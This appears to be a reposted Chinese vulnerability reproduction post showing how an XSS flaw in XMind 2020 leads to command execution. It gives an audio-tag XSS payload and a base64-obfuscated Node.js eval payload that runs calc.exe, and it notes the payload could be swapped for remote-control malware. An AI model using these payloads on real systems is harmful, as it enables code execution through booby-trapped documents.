

Xmind 2020 XSS漏洞导致命令执行复现
source link: https://xz.aliyun.com/t/9559
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Xmind 2020 XSS漏洞导致命令执行复现
今天看到某数字云漏洞预警,但没给利用代码就.....于是跑去复现一下
XMind 是一个全功能的思维导图和头脑风暴软件,为激发灵感和创意而生。作为一款有效提升工作和生活效率的生产力工具,受到全球百千万用户的青睐。
下载地址:https://www.xmind.cn/
下载xmind2020最新版本
一、Xss:
1、利用过程:
主题插入xss利用代码
在大纲页面触发
实现弹窗
2、利用代码:
<audio src=x onerror=confirm("casrc")>
二、命令执行:
1、利用过程:
主题插入命令执行利用代码
在大纲页面触发实现命令执行
触发弹出计算器
2、利用代码:
通过nodejs调用执行系统命令打开计算器
require('child_process').exec('calc.exe',(error, stdout, stderr)=>{alert(stdout: ${stdout}
);});
<audio src=http://a onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ2NhbGMuZXhlJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+e2FsZXJ0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApO30pOw==`,`base64`).toString())'>
三、评价
实现过程简单,用户范围庞大(看了下实验室小伙伴电脑基本都有),危害严重(替换利用代码可实现cs上线等功能)。谨防钓鱼攻击。复现完毕~
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK